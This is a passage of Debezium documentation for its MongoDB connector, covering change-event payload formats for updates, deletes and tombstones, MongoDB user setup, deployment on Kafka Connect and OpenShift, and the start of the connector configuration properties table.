A change event's value schema is the same in every change event that the connector generates for a particular collection.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`io.debezium.data.Json` is the schema for the payload's `after`, `patch`, and `filter` fields. This schema is specific to the `customers` collection. A _create_ event is the only kind of event that contains an `after` field. An _update_ event contains a `filter` field and a `patch` field. A _delete_ event contains a `filter` field, but not an `after` field nor a `patch` field.\n\n|3\n|`name`\na|`io.debezium.connector.mongo.Source` is the schema for the payload's `source` field. This schema is specific to the MongoDB connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`dbserver1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `dbserver1` is the connector name, `inventory` is the database, and `customers` is the collection. This schema is specific to the collection.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the documents they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}#avro-serialization[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`after`\n|An optional field that specifies the state of the document after the event occurred. In this example, the `after` field contains the values of the new document's `\\_id`, `first_name`, `last_name`, and `email` fields. The `after` value is always a string. By convention, it contains a JSON representation of the document. MongoDB's oplog entries contain the full state of a document only for _create_ events and also for `update` events, when the `capture.mode` option is set to `change_streams_update_full`; in other words, a _create_ event is the only kind of event that contains an _after_ field, when the `capture.mode` option is set either to `oplog` or `change_streams`.\n\n|7\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the new document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. 
It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event (oplog capture mode only).\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction (change streams capture mode only).\n\n|8\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a document. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|9\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[id=\"mongodb-update-events\"]\n=== _update_ events\n\n==== Oplog capture mode (legacy)\nThe value of a change event for an update in the sample `customers` collection has the same schema as a _create_ event for that collection. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. An _update_ event does not have an `after` value. Instead, it has these two fields:\n\n* `patch` is a string field that contains the JSON representation of the idempotent update operation\n\n* `filter` is a string field that contains the JSON representation of the selection criteria for the update. The `filter` string can include multiple shard key fields for sharded collections.\n\nHere is an example of a change event value in an event that the connector generates for an update in the `customers` collection:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"u\", \/\/ <1>\n \"ts_ms\": 1465491461815, \/\/ <2>\n \"patch\": \"{\\\"$set\\\":{\\\"first_name\\\":\\\"Anne Marie\\\"}}\", \/\/ <3>\n \"filter\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"}}\", \/\/ <4>\n \"source\": { \/\/ <5>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 6,\n \"h\": 1546547425148721999\n }\n }\n }\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `u` indicates that the operation updated a document.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`patch`\n|Contains the JSON string representation of the actual MongoDB idempotent change to the document. 
In this example, the update changed the `first_name` field to a new value. +\n +\nAn _update_ event value does not contain an `after` field.\n\n|4\n|`filter`\n|Contains the JSON string representation of the MongoDB selection criteria that was used to identify the document to be updated.\n\n|5\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the updated document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event.\n\n|===\n\n[WARNING]\n====\nIn a {prodname} change event, MongoDB provides the content of the `patch` field. The format of this field depends on the version of the MongoDB database. Consequently, be prepared for potential changes to the format when you upgrade to a newer MongoDB database version. Examples in this document were obtained from MongoDB 3.4, In your application, event formats might be different.\n====\n\n[NOTE]\n====\nIn MongoDB's oplog, _update_ events do not contain the _before_ or _after_ states of the changed document. Consequently, it is not possible for a {prodname} connector to provide this information. However, a {prodname} connector provides a document's starting state in _create_ and _read_ events. Downstream consumers of the stream can reconstruct document state by keeping the latest state for each document and comparing the state in a new event with the saved state. {prodname} connector's are not able to keep this state.\n====\n\n==== Change streams capture mode\nThe value of a change event for an update in the sample `customers` collection has the same schema as a _create_ event for that collection. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. An _update_ event does have an `after` value only if the `capture.mode` option is set to `change_streams_update_full`. There is a new structured field `updateDescription` with a few additional fields in this case:\n\n* `updatedFields` is a string field that contains the JSON representation of the updated document fields with their values\n\n* `removedFields` is a list of field names that were removed from the document\n\n* `truncatedArrays` is a list of arrays in the document that were truncated\n\nHere is an example of a change event value in an event that the connector generates for an update in the `customers` collection:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... 
},\n \"payload\": {\n \"op\": \"u\", \/\/ <1>\n \"ts_ms\": 1465491461815, \/\/ <2>\n \"after\":\"{\\\"_id\\\": {\\\"$numberLong\\\": \\\"1004\\\"},\\\"first_name\\\": \\\"Anne Marie\\\",\\\"last_name\\\": \\\"Kretchmar\\\",\\\"email\\\": \\\"annek@noanswer.org\\\"}\", \/\/ <3>\n \"updateDescription\": {\n \"removedFields\": null,\n \"updatedFields\": \"{\\\"first_name\\\": \\\"Anne Marie\\\"}\", \/\/ <4>\n \"truncatedArrays\": null\n },\n \"source\": { \/\/ <5>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 1,\n \"h\": null,\n \"tord\": null,\n \"stxnid\": null,\n \"lsid\":\"{\\\"id\\\": {\\\"$binary\\\": \\\"FA7YEzXgQXSX9OxmzllH2w==\\\",\\\"$type\\\": \\\"04\\\"},\\\"uid\\\": {\\\"$binary\\\": \\\"47DEQpj8HBSa+\/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=\\\",\\\"$type\\\": \\\"00\\\"}}\",\n \"txnNumber\":1\n }\n }\n }\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `u` indicates that the operation updated a document.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`after`\n|Contains the JSON string representation of the actual MongoDB document.\n +\nAn _update_ event value does not contain an `after` field if the capture mode is not set to `change_streams_update_full`\n\n|4\n|`updatedFields`\n|Contains the JSON string representation of the updated field values of the document. In this example, the update changed the `first_name` field to a new value.\n\n|5\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ event for the same collection, but the values are different since this event is from a different position in the oplog. 
The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the updated document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction.\n\n|===\n\n[WARNING]\n====\nThe `after` value in the event should be handled as the point-in-time value of the document.\nThe value is not calculated dynamically but is obtained from the collection.\nThus, if multiple updates follow one another closely, all _update_ events might contain the same `after` value, representing the last value stored in the document.\n\nIf your application depends on gradual change evolution, rely on `updateDescription` only.\n====\n\n[id=\"mongodb-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same collection. The `payload` portion in a _delete_ event contains values that are different from _create_ and _update_ events for the same collection. In particular, a _delete_ event contains neither an `after` value nor `patch` or `updateDescription` values. Here is an example of a _delete_ event for a document in the `customers` collection:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"d\", \/\/ <1>\n \"ts_ms\": 1465495462115, \/\/ <2>\n \"filter\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"}}\", \/\/ <3>\n \"source\": { \/\/ <4>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": true,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 6,\n \"h\": 1546547425148721999\n }\n }\n }\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this document was deleted.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`filter`\n|Contains the JSON string representation of the MongoDB selection criteria that was used to identify the document to be deleted (oplog capture mode only).\n\n|4\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ or _update_ event for the same collection, but the values are different since this event is from a different position in the oplog. 
The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contained the deleted document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event (oplog capture mode only).\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction (change streams capture mode only).\n\n|===\n\nMongoDB connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[id=\"mongodb-tombstone-events\"]\n=== Tombstone events\nAll MongoDB connector events for a uniquely identified document have exactly the same key. When a document is deleted, the _delete_ event value still works with log compaction because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that key, the message value must be `null`. To make this possible, after {prodname}\u2019s MongoDB connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value. A tombstone event informs Kafka that all messages with that same key can be removed.\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-mongodb-to-work-with-debezium\n\/\/ Title: Setting up MongoDB to work with a {prodname} connector\n[[setting-up-mongodb]]\n== Setting up MongoDB\n\nThe MongoDB connector uses MongoDB's oplog\/change streams to capture the changes, so the connector works only with MongoDB replica sets or with sharded clusters where each shard is a separate replica set.\nSee the MongoDB documentation for setting up a https:\/\/docs.mongodb.com\/manual\/replication\/[replica set] or https:\/\/docs.mongodb.com\/manual\/sharding\/[sharded cluster].\nAlso, be sure to understand how to enable https:\/\/docs.mongodb.com\/manual\/tutorial\/deploy-replica-set-with-keyfile-access-control\/#deploy-repl-set-with-auth[access control and authentication] with replica sets.\n\nYou must also have a MongoDB user that has the appropriate roles to read the `admin` database where the oplog can be read. 
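For example, such a user might be created with the `mongo` shell as in the following sketch. The user name, password, and role list here are illustrative placeholders only; adapt them to the full privilege requirements described in this section, including the ones that follow the example.\n\n[source,shell]\n----\nmongo --host rs0\/192.168.99.100:27017 --eval '\ndb.getSiblingDB(\"admin\").createUser({\n user: \"debezium\", \/\/ placeholder user name\n pwd: \"dbz\", \/\/ placeholder password\n roles: [\n  { role: \"read\", db: \"admin\" }, \/\/ read the oplog\n  { role: \"read\", db: \"config\" }, \/\/ sharded cluster configuration\n  { role: \"read\", db: \"inventory\" } \/\/ the captured database\n ]\n})'\n----\n\n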
Additionally, the user must be able to read the `config` database in the configuration server of a sharded cluster and must have the `listDatabases` privilege action.\nWhen change streams are used (the default), the user must also have the cluster-wide privilege actions `find` and `changeStream`.\n\nifdef::community[]\n[[mongodb-in-the-cloud]]\n=== MongoDB in the Cloud\n\nYou can use the {prodname} connector for MongoDB with https:\/\/www.mongodb.com\/atlas\/database[MongoDB Atlas].\nWhen connecting {prodname} to MongoDB Atlas, enable one of the xref:mongodb-property-capture-mode[`capture modes`] to be based on change streams, rather than the oplog.\nNote that MongoDB Atlas supports only secure connections via SSL; that is, the xref:mongodb-property-mongodb-ssl-enabled[`+mongodb.ssl.enabled+`] connector option _must_ be set to `true`.\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-mongodb-connectors\n\/\/ Title: Deployment of {prodname} MongoDB connectors\n[[mongodb-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\nTo deploy a {prodname} MongoDB connector, you install the {prodname} MongoDB connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.\n\n.Prerequisites\n* link:https:\/\/zookeeper.apache.org\/[Apache Zookeeper], link:http:\/\/kafka.apache.org\/[Apache Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* MongoDB is installed and is xref:{link-mongodb-connector}#setting-up-mongodb[set up to work with the {prodname} connector].\n\n.Procedure\n. Download the\nifeval::['{page-version}' == 'master']\n{link-mongodb-plugin-snapshot}[connector's plug-in archive].\nendif::[]\nifeval::['{page-version}' != 'master']\nhttps:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mongodb\/{debezium-version}\/debezium-connector-mongodb-{debezium-version}-plugin.tar.gz[connector's plug-in archive].\nendif::[]\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. 
Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Apache Zookeeper, Apache Kafka, and Kafka Connect with the MongoDB connector already installed and ready to run.\n\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\n\nThe {prodname} xref:tutorial.adoc[tutorial] walks you through using these images, and this is a great way to learn about {prodname}.\nendif::community[]\n\nifdef::product[]\nYou can use either of the following methods to deploy a {prodname} MongoDB connector:\n\n* xref:openshift-streams-mongodb-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].\n+\nThis is the preferred method.\n* xref:deploying-debezium-mongodb-connectors[Build a custom Kafka Connect container image from a Dockerfile].\n\n.Additional resources\n\n* xref:mongodb-connector-properties[]\n\n\/\/ Type: concept\n[id=\"openshift-streams-mongodb-connector-deployment\"]\n=== MongoDB connector deployment using {StreamsName}\n\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-streams-deployment.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"using-streams-to-deploy-debezium-mongodb-connectors\"]\n=== Using {StreamsName} to deploy a {prodname} MongoDB connector\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"deploying-debezium-mongodb-connectors\"]\n=== Deploying a {prodname} MongoDB connector by building a custom Kafka Connect container image from a Dockerfile\n\nTo deploy a {prodname} MongoDB connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive and then push this container image to a container registry.\nYou then create two custom resources (CRs):\n\n* A `KafkaConnect` CR that defines your Kafka Connect instance.\n The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.\n You apply this CR to the OpenShift instance where link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.\n {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.\n\n* A `KafkaConnector` CR that defines your {prodname} MongoDB connector.\n Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.\n\n.Prerequisites\n\n* MongoDB is running and you completed the steps to {LinkDebeziumUserGuide}#setting-up-mongodb[set up MongoDB to work with a {prodname} connector].\n\n* {StreamsName} is deployed on OpenShift and is running Apache Kafka and Kafka Connect.\n For more information, see link:{LinkDeployStreamsOpenShift}[{NameDeployStreamsOpenShift}].\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.\n\n.Procedure\n\n. Create the {prodname} MongoDB container for Kafka Connect:\n\n.. 
Create a Dockerfile that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following command:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-mongodb.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nRUN mkdir -p \/opt\/kafka\/plugins\/debezium \/\/ <2>\nRUN curl -O {red-hat-maven-repository}debezium\/debezium-connector-{connector-file}\/{debezium-version}-redhat-__<build_number>__\/debezium-connector-{connector-file}-{debezium-version}-redhat-__<build_number>__-plugin.zip\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Specifies the path to your Kafka Connect plug-ins directory. If your Kafka Connect plug-ins directory is in a different location, replace this path with the actual path of your directory.\n+\nThe command creates a Dockerfile with the name `debezium-container-for-mongodb.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-mongodb.yaml` Dockerfile that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter one of the following commands:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-mongodb:latest .\n----\n+\n[source,shell,options=\"nowrap\"]\n----\ndocker build -t debezium-container-for-mongodb:latest .\n----\nThe preceding commands build a container image with the name `debezium-container-for-mongodb`.\n\n.. Push your custom image to a container registry, such as `quay.io` or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-mongodb:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-mongodb:latest\n----\n\n.. Create a new {prodname} MongoDB `KafkaConnect` custom resource (CR).\nFor example, create a `KafkaConnect` CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n #...\n image: debezium-container-for-mongodb \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that `KafkaConnector` resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your Debezium connector.\nThis property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.\n\n.. Apply the `KafkaConnect` CR to the OpenShift Kafka Connect environment by entering the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThe command adds a Kafka Connect instance that specifies the name of the image that you created to run your {prodname} connector.
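\n+\nOptionally, you can confirm that the resource was created before you continue. The following check is a sketch only and assumes that the {StreamsName} Operator has registered the `kafkaconnect` resource type in your cluster:\n+\n[source,shell,options=\"nowrap\"]\n----\noc get kafkaconnect my-connect-cluster\n----\n\n. 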
Create a `KafkaConnector` custom resource that configures your {prodname} MongoDB connector instance.\n+\nYou configure a {prodname} MongoDB connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce change events for a subset of MongoDB replica sets or sharded clusters.\nOptionally, you can set properties that filter out collections that are not needed.\n+\nThe following example configures a {prodname} connector that connects to a MongoDB replica set `rs0` at port `27017` on `192.168.99.100`,\nand captures changes that occur in the collections of the `inventory` database.\n`fulfillment` is the logical name of the replica set.\n+\n.MongoDB `inventory-connector.yaml`\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n name: inventory-connector \/\/ <1>\n labels:\n  strimzi.io\/cluster: my-connect-cluster\nspec:\n class: io.debezium.connector.mongodb.MongoDbConnector \/\/ <2>\n config:\n  mongodb.hosts: rs0\/192.168.99.100:27017 \/\/ <3>\n  mongodb.name: fulfillment \/\/ <4>\n  collection.include.list: inventory[.]* \/\/ <5>\n----\n<1> The name that is used to register the connector with Kafka Connect.\n<2> The name of the MongoDB connector class.\n<3> The host addresses to use to connect to the MongoDB replica set.\n<4> The _logical name_ of the MongoDB replica set, which forms a namespace for generated events and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<5> An optional list of regular expressions that match the collection namespaces (for example, <dbName>.<collectionName>) of all collections to be monitored.\n\n. 
Create your connector instance with Kafka Connect.\nFor example, if you saved your `KafkaConnector` resource in the `inventory-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f inventory-connector.yaml\n----\n+\nThe preceding command registers `inventory-connector` and the connector starts to run against the collections of the `inventory` database as defined in the `KafkaConnector` CR.\nendif::product[]\n\nifdef::community[]\n[[mongodb-example-configuration]]\n=== MongoDB connector configuration example\n\nFollowing is an example of the configuration for a connector instance that captures data from a MongoDB replica set `rs0` at port 27017 on 192.168.99.100, which we logically name `fullfillment`.\nTypically, you configure the {prodname} MongoDB connector in a JSON file by setting the configuration properties that are available for the connector.\n\nYou can choose to produce events for a particular MongoDB replica set or sharded cluster.\nOptionally, you can filter out collections that are not needed.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mongodb.MongoDbConnector\", \/\/ <2>\n \"mongodb.hosts\": \"rs0\/192.168.99.100:27017\", \/\/ <3>\n \"mongodb.name\": \"fullfillment\", \/\/ <4>\n \"collection.include.list\": \"inventory[.]*\" \/\/ <5>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of the MongoDB connector class.\n<3> The host addresses to use to connect to the MongoDB replica set.\n<4> The _logical name_ of the MongoDB replica set, which forms a namespace for generated events and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<5> An optional list of regular expressions that match the collection namespaces (for example, <dbName>.<collectionName>) of all collections to be monitored.\n\nendif::community[]\n\nFor the complete list of the configuration properties that you can set for the {prodname} MongoDB connector,\nsee xref:{link-mongodb-connector}#mongodb-connector-properties[MongoDB connector configuration properties].\n\nifdef::community[]\nYou can send this configuration with a `POST` command to a running Kafka Connect service.\nThe service records the configuration and starts one connector task that performs the following actions:\n\n* Connects to the MongoDB replica set or sharded cluster.\n* Assigns tasks for each replica set.\n* Performs a snapshot, if necessary.\n* Reads the oplog\/change stream.\n* Streams change event records to Kafka topics.\n\n[[mongodb-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a {prodname} MongoDB connector, create a connector configuration, and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* xref:{link-mongodb-connector}#setting-up-mongodb[MongoDB is set up to work with a {prodname} connector].\n* The {prodname} MongoDB connector is installed.\n\n.Procedure\n\n. Create a configuration for the MongoDB connector.
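\n+\nFor example, if you save the configuration shown above to a file named `inventory-connector.json` (a hypothetical file name), the next step can be performed with a command like the following, assuming that the Kafka Connect REST API listens on `localhost:8083`:\n+\n[source,shell,options=\"nowrap\"]\n----\n$ curl -i -X POST -H \"Accept:application\/json\" -H \"Content-Type:application\/json\" http:\/\/localhost:8083\/connectors\/ -d @inventory-connector.json\n----\n\n. 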
Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\nendif::community[]\n\n.Results\nAfter the connector starts, it completes the following actions:\n\n* xref:{link-mongodb-connector}#mongodb-performing-a-snapshot[Performs a consistent snapshot] of the collections in your MongoDB replica sets.\n* Reads the oplogs\/change streams for the replica sets.\n* Produces change events for every inserted, updated, and deleted document.\n* Streams change event records to Kafka topics.\n\nifdef::product[]\n\/\/ Type: procedure\n[id=\"verifying-that-the-debezium-mongodb-connector-is-running\"]\n=== Verifying that the {prodname} MongoDB connector is running\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-verifying-the-connector-deployment.adoc[leveloffset=+1]\nendif::product[]\n\n\/\/ Type: reference\n\/\/ Title: Description of {prodname} MongoDB connector configuration properties\n[[mongodb-connector-properties]]\n=== Connector properties\n\nThe {prodname} MongoDB connector has numerous configuration properties that you can use to achieve the right connector behavior for your application.\nMany properties have default values. Information about the properties is organized as follows:\n\n* xref:debezium-mongodb-connector-required-configuration-properties[Required {prodname} MongoDB connector configuration properties]\n* xref:debezium-mongodb-connector-advanced-configuration-properties[Advanced {prodname} MongoDB connector configuration properties]\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[id=\"debezium-mongodb-connector-required-configuration-properties\"]\n.Required {prodname} MongoDB connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[mongodb-property-name]]<<mongodb-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|[[mongodb-property-connector-class]]<<mongodb-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.mongodb.MongoDbConnector` for the MongoDB connector.\n\n|[[mongodb-property-mongodb-hosts]]<<mongodb-property-mongodb-hosts, `+mongodb.hosts+`>>\n|\n|The comma-separated list of hostname and port pairs (in the form 'host' or 'host:port') of the MongoDB servers in the replica set. The list can contain a single hostname and port pair. If `mongodb.members.auto.discover` is set to `false`, then the host and port pair should be prefixed with the replica set name (e.g., `rs0\/localhost:27017`). 
+\n +\n[NOTE]\n====\nIt is mandatory to provide the current primary address.\nThis limitation will be removed in the next {prodname} release.\n====\n\n|[[mongodb-property-mongodb-name]]<<mongodb-property-mongodb-name, `+mongodb.name+`>>\n|\n|A unique name that identifies the connector and\/or MongoDB replica set or sharded cluster that this connector monitors.\nEach server should be monitored by at most one {prodname} connector, since this server name prefixes all persisted Kafka topics emanating from the MongoDB replica set or cluster.\nUse only alphanumeric characters, hyphens, dots and underscores to form the name.\nThe logical name should be unique across all other connectors, because the name is used as the prefix in naming the Kafka topics that receive records from this connector. +\n +\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\n====\n\n|[[mongodb-property-mongodb-user]]<<mongodb-property-mongodb-user, `+mongodb.user+`>>\n|\n|Name of the database user to be used when connecting to MongoDB. This is required only when MongoDB is configured to use authentication.\n\n|[[mongodb-property-mongodb-password]]<<mongodb-property-mongodb-password, `+mongodb.password+`>>\n|\n|Password to be used when connecting to MongoDB. This is required only when MongoDB is configured to use authentication.\n\n|[[mongodb-property-mongodb-authsource]]<<mongodb-property-mongodb-authsource, `+mongodb.authsource+`>>\n|`admin`\n|Database (authentication source) containing MongoDB credentials. This is required only when MongoDB is configured to use authentication with another authentication database than `admin`.\n\n|[[mongodb-property-mongodb-ssl-enabled]]<<mongodb-property-mongodb-ssl-enabled, `+mongodb.ssl.enabled+`>>\n|`false`\n|Whether the connector uses SSL to connect to MongoDB 